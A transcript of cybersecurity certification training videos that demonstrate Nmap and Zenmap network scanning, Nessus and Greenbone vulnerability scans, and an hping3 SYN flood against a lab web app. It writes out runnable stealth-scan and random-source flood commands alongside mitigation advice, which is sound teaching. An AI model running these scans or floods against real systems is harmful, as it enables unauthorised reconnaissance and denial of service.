or anything like that. So 192.168.4.0/22, meaning 22 bits in the subnet mask. This is my network address range. I'm simply
performing reconnaissance here, so I can see which hosts respond on the network. So this is a passive type of
reconnaissance tool. Now it's not that it can't be detected, but we aren't actively trying to do anything to the
machines or to exploit any vulnerabilities.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22. The output displays
a list of network hosts. The prompt does not change. [Video description ends]
So at this point, we have a list of all the hosts that are up and running. We can see the IP addresses for them,
along with the MAC addresses. And because the first three octets (24 bits) of the 48-bit MAC address identify the vendor (the OUI), sometimes you'll see it'll show you the actual vendor name, like Google, or Hewlett Packard, or
VMware, and so on.
[Video description begins] He points to the host addresses in the output. He executes the following command:
clear. No output returns and the prompt does not change. [Video description ends]
Bear in mind, that when you're running these commands, so I'll use the up arrow key to bring up that first
command. You can always use the > symbol, so the output redirection symbol, and store the output in a file.
So maybe I'd put this on the root of the filesystem on this host and call it active_hosts.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22 > /active_hosts. No
output returns and the prompt does not change. [Video description ends]
So then I have it stored in a file, I can refer to it at any point in time. So for example, using the cat command, I
can refer to /active_hosts.
[Video description begins] He executes the following command: cat /active_hosts. The output displays a list of
the files contents. The prompt does not change. [Video description ends]
And there's the contents of that. So that's something else to bear in mind.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Now we can also do operating system, or OS, fingerprinting against a specific host. What kind of firewall is installed on that host, how it's configured, and how hardened the host is will determine what we get returned back. So let's go ahead and run nmap -sV. So I want to scan services running on the host.
But at the same time -O, I want to do OS fingerprinting. And at this point, now that I know which hosts are
active on the network, I might start choosing a specific host against which I want to run this command. So I'm
going to go ahead and pop that in there.
[Video description begins] He executes the following command: nmap -sV -O 192.168.4.56. The output
displays a list of open ports and the OS details. The output includes a table with four columns and several
rows. The column headers are PORT, STATE, SERVICE, and VERSION. The prompt does not change. [Video
description ends]
Now before too long, it doesn't take too much to figure out that this is a machine running a Linux 2.6 kernel.
And if we scroll up we can also see, not only that we have a number of open ports for services like ftp, ssh,
telnet, smtp. There's an awful lot of stuff running here; it makes me wonder, should it be? Or is a lot of that
simply running but isn't being used? Hard to say. But what we can also see here is the VERSION of each of
the services. I can see vsftpd 2.3.4 for the version of the FTP Daemon. I can see OpenSSH and the version
that's used for that. I can see Apache httpd 2.2.8. I can see this is running on Ubuntu. So we're learning way too
much information. This should not be readily available, even if this host is on a private network.
[Video description begins] He points to the versions of several ports in the output. [Video description ends]
So I'm going to go ahead and clear the screen. We'll take a look at a couple of other variations as well. So I'm
going to run nmap yet again. And let's say that I'm going to pass it -sT, because I'm only interested in listing TCP ports. We'll put in the same host once again.
[Video description begins] He executes the following command: nmap -sT 192.168.4.56. The output displays a
list of open tcp ports. The prompt does not change. [Video description ends]
So now, all we're seeing is a list of open TCP ports on that host. And of course the MAC address of the
machine that we ran this against. Now remember, this is just network scanning, this is part of reconnaissance.
So we can determine what is listening on the network, so which hosts are active. And then for each of those
hosts, which network services they have in a listening state. We can also do the same type of thing for UDP. So,
if I were to bring up the previous command here,
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
I can simply change the capital T to a U, making it -sU for a UDP scan. And I can even specify a port, let's say -p for port number and
port 53. UDP port 53 is used by DNS servers.
[Video description begins] He executes the following command: nmap -sU -p 53 192.168.4.56. The output
displays a table of open udp ports. The table has three columns and one row. The column headers are PORT,
STATE, and SERVICE. The prompt does not change. He points to the row entry, PORT: 53/udp, STATE: open,
and SERVICE: domain. [Video description ends]
So we can see here that indeed, yes, it is in an open state. So we know that this is a Domain Name Server, or
DNS server, used for name resolutions. So we're learning more, and more, and more. Now another interesting
aspect of nmap is you can run it essentially in stealth mode.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So if I run -s, then a capital S for a SYN or stealth scan, I can then give it the IP address of the target. Now what does this mean? Normally, if you're using nmap, let's say to make a full TCP connection to a target, there's a three-way handshake that has to occur. And in many cases, systems won't write anything to a log until the three-way handshake has completed. So with the SYN or stealth type of scan, we aren't establishing a full connection. We're not giving it the final acknowledgement that says yes. Instead, we send a reset connection packet, or RST. And so as a result, this allows us to scan a host, and depending on the host itself of course, how it's configured, and how patched it is, this type of scan may not even show up in its log. So we can see we did get the return result.
[Video description begins] He executes the following command: nmap -sS 192.168.4.56. The output displays a
list of open ports. [Video description ends]
Because our original command, if we go back up, was to simply connect to that host. And it's showing us all of
the ports that are open on that host. But it did it in stealth mode. And that was specified with this S in the
command-line.
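To recap the scan variations from this demonstration in one place, and to tee up the comparison topic that follows, the same scans can also be saved as XML for later diffing. The addresses are the ones used in this demo and the XML file name is just an example:

nmap -sn 192.168.4.0/22               # host discovery only, no port scan
nmap -sT 192.168.4.56                 # TCP connect scan
nmap -sS 192.168.4.56                 # TCP SYN ("stealth") scan
nmap -sU -p 53 192.168.4.56           # UDP scan of port 53 (DNS)
nmap -sV -O 192.168.4.56              # service version and OS fingerprinting
nmap -sS -oX scan1.xml 192.168.4.56   # save results as XML for later comparison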
[Video description begins] He switches to a browser. The following URL is open: nmap.org/zenmap/. The
page includes an "Nmap download page" link. [Video description ends]
And then, there's the Zenmap GUI front end, which uses Nmap in the background. So we can see here from the
nmap.org download page that we can download Nmap along with the Zenmap GUI all in one package.
[Video description begins] He clicks the "Nmap download page" link and its corresponding page opens in the
browser. [Video description ends]
I've already downloaded and installed this for the Windows platform on my Windows 10 station.
[Video description begins] He opens the Zenmap window. It is divided into four parts. The first part is a menu
bar. The second part includes a drop-down list box labeled "Target", a field labeled "Command", another
drop-down list box labeled "Profile". It also includes a button labeled "Scan" adjacent to the "Profile" drop-
down list box. The third part contains two tabs: Hosts and Services. The "Hosts" tab is selected and the
"Hosts" pane is open. The fourth part is the content pane. It includes the following tabs: Nmap Output, Ports /
Hosts, and Scans. The "Nmap Output" tab is selected. [Video description ends]
So here in Zenmap, the first thing we have to do is define the Target. Which hosts on the network do I want to
scan? Or it might be the entire network to discover which hosts are up and running. So in my case, I'm going to
put in 192.168.4.0/22.
[Video description begins] He selects the following option in the "Target" drop-down list box: 192.168.4.0/22.
The following text gets populated in the "Command" field: nmap -T4 -A -v 192.168.4.0/22. [Video description
ends]
22-bit subnet mask. And notice, it's generating the actual background nmap command shown down below here
in the Command bar. Now we can see that as we select a different scanning profile, for example, if I were to
choose Ping scan, it's changing the command based on my Profile selection. So, I'm going to go ahead here and
just do a Quick scan.
[Video description begins] He selects the following option in the "Profile" drop-down list box: Quick Scan.
The following text gets populated in the "Command" field: nmap -T4 -F 192.168.4.0/22. [Video description
ends]
This is one of those things that you want to do periodically. And ideally, you will run an intense or a slow
comprehensive scan to learn as much as you possibly can about the hosts that are detected out on the network.
In this case, I'll just do a quick scan. And I'll click the Scan button. So we can see now under Nmap Output that
the scan has begun. And, if we go to the Scans tab, we'll see it's listed here at any point in time. We can cancel
it and remove it from the list.
[Video description begins] The "Scans" tab in the content pane include two buttons labeled "Remove Scan"
and "Cancel Scan". [Video description ends]
But I'm just going to go back to the Nmap Output. And before too long, we can see that the scan is completed.
Now we're going to know that because down under the Nmap Output tab, if you go to the very bottom, it says
Nmap done. And so, it's telling us that there are 17 hosts up on this TCP/IP subnet. We can see the host IP
addresses listed over in the left-hand column.
[Video description begins] He points to the "Hosts" pane. [Video description ends]
If we scroll all the way back up, of course, we can see each host listed that was scanned. And then we can see
some details for it. So for example, here's our first one, 192.168.4.1, the host is up. And we can see that it's got
a couple of ports open. So domain, or DNS, on 53. And then Universal Plug and Play, or UPnP, on port 1900.
Universal Plug and Play is known to have some security vulnerabilities, especially with IoT devices or even
wireless routers. So this would be an indicator that maybe that's something that should be addressed to harden
that device. In the left-hand column, you can also view this by service.
[Video description begins] He points to the output in the "Nmap Output" tab. [Video description ends]
[Video description begins] He selects the "Services" tab and the "Services" pane opens. It includes "jetdirect",
"http", "ftp", and "mysql" options. [Video description ends]
And on the right, I then get a filtered list of hosts that are JetDirect devices. In other words, network printing
devices, in this case listening on tcp port 9100.
[Video description begins] He clicks the "jetdirect" option and its corresponding details appear in the "Ports /
Hosts" tab in the content pane. [Video description ends]
I can see any MySQL hosts that are out on the network, HTTP hosts, FTP hosts, and so on.
[Video description begins] He clicks the "mysql" option and its corresponding details appear in the "Ports /
Hosts" tab in the content pane. [Video description ends]
So this is the purpose of Nmap, whether you use it with or without the Zenmap front-end GUI: to scan the network to discover what's there, and also to see which ports are open on those hosts. Of course, you can also go to your Scan menu and save the scan. And you might even run periodic scans and then compare them to see what's changed.
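As a rough sketch of how that periodic comparison might be scripted outside the GUI, Nmap can write XML output with -oX, and the ndiff utility that ships with Nmap compares two such files. The file names and subnet below are just this demonstration's examples.

# Save a baseline scan as XML
nmap -T4 -F -oX scan1.xml 192.168.4.0/22
# ...some time later, save a second scan of the same range
nmap -T4 -F -oX scan2.xml 192.168.4.0/22
# Show hosts and ports that were added (+) or removed (-) between the two scans
ndiff scan1.xml scan2.xml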
[Video description begins] Topic title: Network Scan Comparisons. The presenter is Dan Lachance. [Video
description ends]
One of the reasons it's important to conduct periodic network scans is so that you can identify what's changed: whether devices have been removed from the network, and also whether devices have been added to the network. Sometimes a device added to the network, especially if it wasn't deployed by the IT department and it's running an operating system that we wouldn't normally use, such as Linux, might be an indicator of some kind of compromise. So let's get started here in Zenmap, the front-end GUI to the Nmap tool.
[Video description begins] The Zenmap window is open. The menu bar includes a Tools menu. [Video
description ends]
I'm going to compare two scans that I've already taken previously on my network. So I'm going to go to the
Tools menu. And I'm going to choose Compare Results.
[Video description begins] A dialog box labeled "Compare Results" opens. It includes two text boxes labeled
"A Scan" and "B Scan". Adjacent to both text boxes there are two buttons labeled "Open". [Video description
ends]
I'm going to click Open for the A Scan, and I'm going to open up a file I've got called Scan1.xml. That's the result of running an Nmap scan here previously and saving it as an XML file. For the B Scan, I'm going to go ahead and choose Scan2.xml. And what it does, if we just maximize this, is start to compare the differences between the two scans. And the order that you select these scans in, in other words the A Scan versus the B Scan, is important in terms of how you interpret the results.
So when I have a minus sign in front of an entry, clearly shown here in red, it means that item has changed: it was removed or is no longer present. Whereas the + means it is now present or was added. Anything that just has a space in front of it, instead of a - for removed or a + for added, is unchanged. So as we scroll down through the listing, we'll see a lot of comparisons here, and we're looking, obviously, for the red and the green. So I can see that this host with a specific IP address and MAC address looks like it was removed, because initially in the A scan, scan number 1, this host was up and running, and in Scan2 that host was down.
[Video description begins] He points to the following text: 192.168.0.11, 5C:51:88:88:F1:59:. [Video
description ends]
So we're now seeing that we have a change between those two scans, in terms of hosts that were up and
running versus ones that are not. And we can do the same thing as we continue on with our comparison.
[Video description begins] He points to the following text: 192.168.0.13:. [Video description ends]
So again, we can see we have another host IP address shown here that was down initially in Scan1 but then came online; it was added. It's the same IP address, and it was scanned in Scan1, there was just no response.
[Video description begins] He points to the following text: 192.168.0.13, E8:9E:B4:19:4A:BB:. [Video
description ends]
Now there is a response, at least at the time that Scan2 was taken: the +Host is up. And we can see any ports that are available on it. In some cases, it'll be able to identify what it is. In this case, a Sony Android TV.
So as we keep going down through here, we can see a lot of these different entries that show up. And based on
what we can see, we can determine that there are devices that either should or should not be on the network.
For example, here we see HP Officejet. So it looks like we've got an HP Officejet device with ports open on
the network. 445 and 3995 and so on. So as we go through this, we can start to learn more about what's
changed on the network. For example, we've got a host that is now up as of scan number two. We can see the
IP address, the MAC address. And we can also see in this case that the ssh and http port on this are open.
[Video description begins] He points to the following text: 192.168.0.6, 9E:DE:D0:B2:92:9B:. [Video
description ends]
It's running a Linux kernel. It says TP-LINK embedded httpd. So this could indicate, for example, that a user
has plugged in some kind of IoT device. Or it could even be a wireless router that has the ssh and http admin
ports open. So this can be a good indicator that things, perhaps, are on the network that shouldn't be.
During this video, you will learn how to run a Nessus scan.
Objectives
[Video description begins] Topic title: Nessus Vulnerability Scan. The presenter is Dan Lachance. [Video
description ends]
Nessus is another vulnerability scanning tool. Now, it's different from a standard network mapping tool like
Nmap, which identifies active hosts on a network and things like open ports. Certainly Nessus will do that as
well. But it can also detect very specific vulnerabilities based on missing patches or software configurations on
detected hosts. So you can go to the tenable.com site to download Nessus and acquire an activation code. I've
already done that and installed it locally. So I'm just going to go ahead and sign in using my credentials.
[Video description begins] The following pop-up box is open: Welcome to Nessus Professional. It includes a
field labeled "Targets" and a button labeled "Submit". [Video description ends]
I'm currently running a trial edition. So I'm just going to click the x to remove that message in the upper right.
And at this point, we can specify a scan. So immediately, I can specify a scan target. I'm going to do that: 192.168.4.0/22. That's a 22-bit subnet mask, the subnet that this host is connected to. So I'm going to go ahead and Submit that scan.
[Video description begins] He types the following text in the "Targets" field: 192.168.4.0/22. [Video
description ends]
[Video description begins] The following pop-up box appears: My Host Discovery Scan Results. It includes a
button labeled "Run Scan". It also includes a table with two columns and several rows. The column headers
are "IP" and "DNS". [Video description ends]
After a moment, we can see it's begun to discover hosts on the given subnet range. So I'm going to go ahead
and, up in the column headers, turn on the check mark to select all the ones that were discovered thus far. And
I'm going to choose Run Scan.
[Video description begins] The Nessus Professional web page is open. It is divided into three parts. The first
part includes two options: Scans and Settings. The second part is a navigation pane. The third part is a
content pane. A page called "My Basic Network Scan" is open in the content pane. It includes three tabs:
Hosts, Vulnerabilities, and History. The "Hosts" tab is selected. It includes a table with three columns and
several rows. The column headers include "Host" and "Vulnerabilities". The page also includes a "Scan
Details" section and a "Vulnerabilities" section. [Video description ends]
After a while, we'll see that for each discovered network host, it's begun to determine how many vulnerabilities, if any, there are. And it's still in the midst of running, as we can see here over on the right. Now blue is of no concern according to the Vulnerabilities legend.
[Video description begins] He points to the "Scan Details" section. [Video description ends]
That's informational.
[Video description begins] He points to the "Vulnerabilities" section. It includes a pie chart. [Video
description ends]
And, if I hover over it, we can see that 87% of our vulnerabilities, or messages, are just informational. We can see the number per host. But what concerns me is that we've got some vulnerabilities here showing up as Medium, according to the legend, for the hosts. Now, I'm going to click on that for a particular host to jump into it.
[Video description begins] He clicks the first row entry in the "Vulnerabilities" column and its corresponding
page opens. It includes a table with four columns and several rows. The column headers include "Name" and
"Count". [Video description ends]
Looks like right away we've got SSL issues related to that particular host. So I'm going to click to open that up.
What are those issues?
[Video description begins] He clicks the first row entry in the "Name" column and its corresponding page
opens. It includes a table with four columns and several rows. The column headers include "Sev", "Name",
and "Count". [Video description ends]
[Video description begins] He points to the row entries in the "Sev" column. [Video description ends]
[Video description begins] He clicks the first row entry in the "Name" column and its corresponding page
opens. [Video description ends]
So, if we click on that, that usually means it's a self-signed certificate. Okay, well, that might be acceptable.
[Video description begins] He navigates back to the previous page. [Video description ends]
Depending on what our environment is, we might have configured a trusted root key on all devices so that it
would be trusted. The other thing we can do here, I'll just go back to My Scans and My Basic Network Scan,
just to get back here.
[Video description begins] He navigates back to the "My Basic Network Scan" page. [Video description ends]
We can also actually click directly on the host to get a list of everything about that host. So, for example, I can
see it's running the Linux kernel.
[Video description begins] He clicks the first row entry in the "Host" column and its corresponding page
opens. It includes a "Host Details" section and a table with four columns and several rows. The column
headers include "Name" and "Family". [Video description ends]
And I can also see the items it's discovered running on that host. For example, it's discovered which SSL and TLS versions are supported. It knows that the Nessus scanner is installed on it, so that would be the host we're sitting at right here that was discovered on the network. So we can see some of that also shown here.
[Video description begins] He points at the row entries in the "Name" column header. [Video description
ends]
Now, when we go back to our scans, let's say I go back to My Basic Network Scan.
[Video description begins] He navigates back to the "My Basic Network Scan" page. [Video description ends]
You can also just view all of the vulnerabilities at the top by clicking the Vulnerabilities tab.
[Video description begins] He selects the "Vulnerabilities" tab. It includes a table with four columns and
several rows. The column headers include "Name", "Family", and "Count". [Video description ends]
[Video description begins] He clicks the second row entry in the "Name" column and its corresponding page
opens. It includes a table with four columns and several rows. The column headers include "Name", "Family",
and "Count". [Video description ends]
So, for example, I've got multiple DNS issues, 12 instances under Count, and if we click on it, we can see them broken down into the count per DNS issue.
[Video description begins] He points to the row entries in the "Count" column. He clicks the third row entry in
the "Name" column and its corresponding page opens. [Video description ends]
I'm interested not necessarily in just these informational items, but more so in things that are problematic, like
medium level threats.
[Video description begins] He navigates back to the previous page. He then clicks the first row entry in the
"Name" column and its corresponding page opens. It includes a section called "Output" under which there is a
table with two columns and one row. The column headers are "Port" and "Hosts". [Video description ends]
So, DNS Server Cache Snooping, that's not good. I'm going to click on that. And we can read a little bit about
what that means. But more importantly, at the very bottom, we can see the port number. So udp port 53, it's a
DNS server, accepting DNS client queries. And we can see the IP addresses of the discovered hosts where
that's an issue. So we can start to remediate or solve that problem because we know the identity of the hosts
where that problem exists. Now, the thing to remember about vulnerability scanning is that it goes very in-depth on a machine. It will be checking specific software on the machine, its versions, and known vulnerabilities. And to stay up to date with that, the scanner needs to have software updates applied.
[Video description begins] He clicks the "Settings" option in the first part of the screen. The SETTINGS pane
opens in the second part. It includes an "About" option. The About option is selected and its corresponding
page is open in the content pane. It includes several tabs including "Overview" and "Software Update". He
selects the "Software Update" tab. It includes three radio buttons labeled "Update all components", "Update
plugins", and "Disabled". It also includes a drop-down list box labeled "Update Frequency" and a button
labeled "Save". The "Update all components" radio button is selected. The "Daily" option is selected in the
"Update Frequency" drop-down list box. [Video description ends]
So if I go to Settings, Software Updates, Update all components is set to occur here daily.
[Video description begins] He navigates to the "My Scans" page. It includes a button labeled "New
Scan". [Video description ends]
Back here to Scans, if we click the New Scan button, we get to select from a number of different templates.
[Video description begins] A page called "Scan Templates" opens. It includes a card labeled "WannaCry
Ransomware". [Video description ends]
For example, if I want to scan for WannaCry Ransomware instances, then I could select that and fill out the
details.
[Video description begins] The "WannaCry Ransomware" page opens. It includes three tabs: Settings,
Credentials, and Plugins. The "Settings" tab is selected. [Video description ends]
But notice that we can also specify whether we want to have a credentialed versus a non-credentialed scan.
[Video description begins] He selects the "Credentials" tab. [Video description ends]
It depends on what your intent is. If we want to be able to reach out across the network, maybe using a standard set of admin credentials that work on all devices, then we could specify that here, and there is no question that this scan will be much more thorough, if that's the intent. If the intent is to see what vulnerabilities could be detected by malicious users who don't have that information, then you might go with a non-credentialed scan.
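Outside the web interface, Nessus also exposes a REST API that can be scripted. The following is only a minimal sketch, assuming a local installation listening on the default port 8834 and placeholder credentials; confirm the exact endpoints and payloads against Tenable's API documentation for your version.

# Authenticate and capture the session token (placeholder credentials, -k allows the self-signed cert)
curl -k -s -X POST https://localhost:8834/session \
  -H "Content-Type: application/json" \
  -d '{"username":"admin","password":"P@ssw0rd"}'
# Use the returned token to list existing scans
curl -k -s https://localhost:8834/scans \
  -H "X-Cookie: token=<token-from-previous-response>"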
This video will show you how to view the results of a vulnerability scan.
Objectives
[Video description begins] Topic title: Greenbone Security Manager Vulnerability Scan. The presenter is Dan
Lachance. [Video description ends]
Greenbone Security Manager, or GSM, is another example of a great vulnerability scanning tool. Now, you
can purchase this and run it on premises such as in a virtual machine. In this case, I'm going to run a live demo
online. So I've gone to the livedemo.greenbone.net URL, where I'm going to sign in with a Username of
livedemo and a Password of livedemo. So we're going to be looking at sample scan information. But it's a great
way to kind of evaluate the product to see what kind of insights can be gained by viewing scan results.
[Video description begins] The Greenbone Security Manager web page includes a "Dashboards" menu, a
"Scans" menu, and an "Assets" menu. [Video description ends]
The first thing I'm going to do is go to the Scans menu and choose Reports. So here we can see that we've got a
report that was generated on a specific date and time.
[Video description begins] The Reports page opens. [Video description ends]
And we get all of these tabs across the top, so I can look at the Results.
[Video description begins] He selects the "Results" tab. It includes a table with several columns and several
rows. The column headers include "Vulnerability", "Severity", and "Location". [Video description ends]
For example, I can sort by any of these things, like Severity. Currently, I'm reviewing severities from highest to lowest. We could also sort the other way if we so chose, but I want to view from highest to lowest. We've got
some high severity items and we see a couple of them listed here. They're repeated because they occur, there
are multiple instances on different hosts. So, if I click to open any of those up, it just gives me a little bit of
details about how that was detected.
[Video description begins] The "Hosts" tab includes a table with several columns and several rows. The
column headers include "IP Address", "OS", "Ports", and "Severity". [Video description ends]
If we go to the Hosts tab we can see all the hosts that were discovered at that point when that scan or that
analysis was being conducted, all the way down to viewing different Linux variants such as Ubuntu Linux and Debian Linux.
[Video description begins] He points to the row entries in the "OS" column. [Video description ends]
We can also see of course, the severity rating over on the far right. This is always what we want to watch out
for. As you might guess, it's not great to have this many occurrences of high severities in the scan.
[Video description begins] He points to the row entries in the "Severity" column. [Video description ends]
We can go to Ports and see the number of hosts with a particular port open.
[Video description begins] He selects the "Ports" tab. It includes a table with three columns and several rows.
The column headers are "Port", "Hosts", and "Severity". [Video description ends]
Such as port 22 for SSH or port 3389 for RDP, for remote management of Windows hosts.
[Video description begins] He points to the row entries in the "Port" column. [Video description ends]
We can go to Applications to see what was discovered, then Operating Systems, and CVEs, where CVE stands for Common Vulnerabilities and Exposures. These are standardized identifiers published on the Internet.
[Video description begins] He selects the "CVEs" tab. It includes a table with four columns and several rows.
The column headers are "CVE", "Hosts", "Occurrences", and "Severity". [Video description ends]
And they're links, so we can click on any one of them to read about it, since it did show up as a result of our scan. So there's a Description of what the vulnerability is. And down below there are some references and advisories, and Vulnerable Products like Windows 7 and Windows Server 2008 R2 SP1, Itanium and x64.
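If you want to look up one of these CVE identifiers programmatically rather than clicking through, one option is the public NVD REST API. This is just a hedged sketch; the CVE number below is only an example identifier, not one taken from this scan.

# Query the NVD 2.0 API for details of a specific CVE (example identifier)
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2017-0144"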
So it's telling us a lot of information right from the get go. If I go under the Scans menu, I can also choose
Results.
[Video description begins] The "Results" page opens. It includes a graph labeled "Results by CVSS". He
points to the graph. [Video description ends]
So for example, over here on the right, we can see that we've got quite a few medium severities, specifically a little over 100, so somewhere between 100 and 110, based on the scans. And we can scroll down below and
see what those items actually are.
[Video description begins] The "Results" page also includes a table with several columns and several rows.
The column headers include "Vulnerability", "Severity", and "Location". [Video description ends]
Now, these severities currently are listed as low. I'm going to click on Severity and then sort it so we see the
highest ones. This is more relevant, SMB 1 is enabled. Again, we can see the detection method and so on, so
that shows up here again. So we're seeing a lot of the same information, but in a little bit of a different way.
And in the bottom right, you also have an Export button where you can export as an XML file. So that's a
possibility as well. If I go to the Assets menu, I can see any hosts that have been detected overall.
[Video description begins] He clicks the "Assets" menu and selects the "Hosts" option from the menu and its
corresponding page opens. It includes a table with several columns and several rows. The column headers
include "Name", "IP Address", "OS", and "Severity". [Video description ends]
Scrolling down this list, I can see all the hosts, the OS type, and the severity levels. So this is a great way to have an inventory of what's out there. Now this may change from one scan to the next, because a later scan might detect new items. But we also have the option of exporting this page's contents, sort of as
an inventory listing. If I go to the Assets menu, I can also view it by operating system. And here we can see the
vulnerabilities per operating system. By far the biggest problem in our specific environment is with vulnerabilities associated with the Windows platform.
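If you're running your own Greenbone installation rather than this live demo, the gvm-tools package provides a command-line client that can pull the same data over the Greenbone Management Protocol. This is a minimal sketch with placeholder credentials; the socket path and option names can vary by installation and gvm-tools version.

# Confirm connectivity to the local gvmd service (socket path varies by install)
gvm-cli --gmp-username admin --gmp-password admin socket \
  --socketpath /run/gvmd/gvmd.sock --xml "<get_version/>"
# Pull scan reports as XML for further processing or export
gvm-cli --gmp-username admin --gmp-password admin socket \
  --socketpath /run/gvmd/gvmd.sock --xml "<get_reports/>"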
In this video, you will use the hping tool to generate network traffic that will cause a SYN flood.
Objectives
[Video description begins] Topic title: Hping Packet Generation. The presenter is Dan Lachance. [Video
description ends]
One type of denial-of-service attack against a web application is a SYN flood. This means that you're essentially sending a lot of half-open TCP connections to a web server but never actually finishing the three-way handshake. Eventually this exhausts the server's resources, thus limiting the legitimate connections that the server will allow. So here at 192.168.4.54, I've got a sample application.
[Video description begins] The BADSTORE.NET web page is open in a browser. [Video description ends]
It's just a sample application that's used to test web application vulnerabilities, and it'll serve our purpose here.
Here in Kali Linux, I'm going to use the hping3 command to execute this denial-of-service attack.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm going to use -c and let's say I specify 10000. -c means count: how many packets we want to send. And I want the size of each of them to be 120 bytes, so -d 120. With -S, I want to send SYN packets. And then I'm going to specify the TCP window size with -w 64. I'm going to use -p to specify a target port of 80. And I'm going to use --flood. And I'm also going to use --rand-source to generate random source IP addresses.
Then, I'll add a space and I'll specify the target. In this case it's 192.168.4.54, that web page we were looking
at. Just before I press Enter, I'm going to start a Wireshark packet capturing session. And I'm going to go ahead
and run this command.
[Video description begins] He executes the following command: hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood
--rand-source 192.168.4.54. The output displays that no replies will be shown as hping is in flood
mode. [Video description ends]
So let's flip over and take a look at what's happening in Wireshark for a moment. So I've got a live capture here
in Wireshark. I'm going to filter it.
[Video description begins] He switches to a window called "Capturing from Wi-Fi". It includes a search bar
and a table with several columns and several rows. The column headers includes Time, Source, and
Destination. [Video description ends]
So I'm going to filter on IP address equals 192.168.4.54. And we can see we have a lot of traffic for .54, but look at all these differing source IP addresses. That's because we told the hping3 command that we want to generate a lot of random source IP addresses trying to make connections to our web site running on 192.168.4.54.
[Video description begins] He types the following text in the search bar: ip.addr==192.168.4.54. The results
in the table get filtered by IP address 192.168.4.54 in the "Source" column. [Video description ends]
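If you prefer to watch this from the command line instead of the Wireshark GUI, tshark, Wireshark's CLI, can apply the same kind of filter. The interface name and address below are just this demonstration's values.

# Live capture limited to traffic to or from the target host (interface name will vary)
tshark -i eth0 -f "host 192.168.4.54"
# Or apply the equivalent display filter to an existing capture file
tshark -r capture.pcapng -Y "ip.addr == 192.168.4.54"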
Let's see if that site is still responding back in the web browser.
[Video description begins] He switches back to the BADSTORE.NET web page in the browser. [Video
description ends]
So back here in the web browser, I've refreshed the web page, but notice it's still trying to load the page. It can't
get a valid connection to it because it's so busy being flooded as a result of our hping3 command. So the real way to mitigate this would be to use a firewall solution, for example, that supports SYN flood protection. Or to use techniques like blackholing, where you take traffic that is coming to this host from those locations and basically route it to nowhere. However, that becomes difficult, because how do you distinguish between legitimate traffic and suspicious traffic?
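On a Linux host or firewall, a couple of hedged examples of SYN flood protections would be enabling SYN cookies and rate-limiting new connections. The thresholds below are purely illustrative, not recommendations.

# Enable TCP SYN cookies so half-open connections don't exhaust the backlog
sysctl -w net.ipv4.tcp_syncookies=1
# Rate-limit new inbound SYN packets with iptables (illustrative thresholds)
iptables -A INPUT -p tcp --syn -m limit --limit 25/second --limit-burst 50 -j ACCEPT
iptables -A INPUT -p tcp --syn -j DROP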
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined scanning and testing techniques used for identifying security weaknesses in
networks, hosts, and apps. We did this by exploring how vulnerability scanning can identify security
weaknesses. We looked at how penetration testing can identify and exploit security weaknesses. We also
discussed the Metasploit Framework, which is used as a penetration testing tool. We talked about Nmap
network scans. And also how to identify changes using network scan comparisons. We looked at how to run a
Nessus and an OpenVAS vulnerability scan. We also looked at how to use the hping tool to generate network
SYN flood traffic. In our next course, we'll move on to explore how an organization can mitigate security
threats against data at rest and data in transit. Using techniques such as patching, data masking, secure data
disposal, and IPsec.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
trainer/consultant. [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialities over the years have included networking, IT
security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst, or CYSA+, certification exam is designed for IT professionals
looking to gain security analysts' skills to perform data analysis; to identify vulnerabilities, threats, and risks to
an organization; to configure and use threat detection tools; and secure and protect an organization's
applications and systems.
In this course, we're going to explore data security risk mitigation using techniques such as patching, data
masking, digital rights management, secure data disposal, and IPsec. I'll start by examining IT security threat
remediation challenges, talk about the importance of hardware and software patching, the various security
controls categories, and the components of organizational security policies. I'll then demonstrate how to enable
data masking in Microsoft Azure, talk about watermarks in AWS with Elastic Transcoder, and also show you
how to work with baselines.
Next I'll examine various types of IT security training exercises and how automation can simplify and expedite
security tasks. I'll then demonstrate how to securely delete a disk partition using a multipass disk-wiping tool
and how to enable Microsoft Group Policy password lockout settings. Lastly, I'll examine the use of IPsec for
securing IP traffic and I will show you how to enable IPsec and how to perform IPsec network traffic analysis.
Upon completion of this video, you will be able to list challenges related to IT security threat remediation.
Objectives
[Video description begins] Topic title: Remediation Challenges. Your host for this session is Dan
Lachance. [Video description ends]
In order to reduce the impact of negative security events, we have to identify any remediation challenges, the
first of which is identifying what you have, what crucial IT systems do we have and where are they? Are they
running on-premises, in the cloud, or both? What kind of data do they take as input? How do they process it
and what is the resultant output? So that means we also have to know what kinds of data and which dataflows between applications exist in our environment.
We then have to be able to classify that data. Without classifying data, how can you properly apply security controls to data that is considered much more sensitive than other types of data? You wouldn't know that unless you classified the data. And there are many automated ways to discover and classify data, both on-premises and in the cloud.
Now after that's been done, we can then identify threats related to highly prized data. And then from there, we
can prioritize those threats and allocate resources accordingly. Naturally, we want to focus on those threats that
are of the highest priority. So the key here is to have a centralized mechanism in place to do this and to use
automation.
Now other remediation challenges include how to harden all of the devices on the network. Now devices
would include laptops; tablets; smartphones; specialty devices such as those in the medical industry; servers,
whether they're physical or virtual; routers; switches; storage arrays. The list goes on and on and on.
But in the enterprise environment, there needs to be a centralized way to inventory what devices exist, how
they're configured. We compare that against a security baseline, and we can automate and schedule hardening.
Hardening means not just applying patches but also removing unnecessary configurations, changing defaults.
And a periodic review of what we have and how it's configured is always important so that we can identify, for
example, new devices on the network that perhaps shouldn't be there.
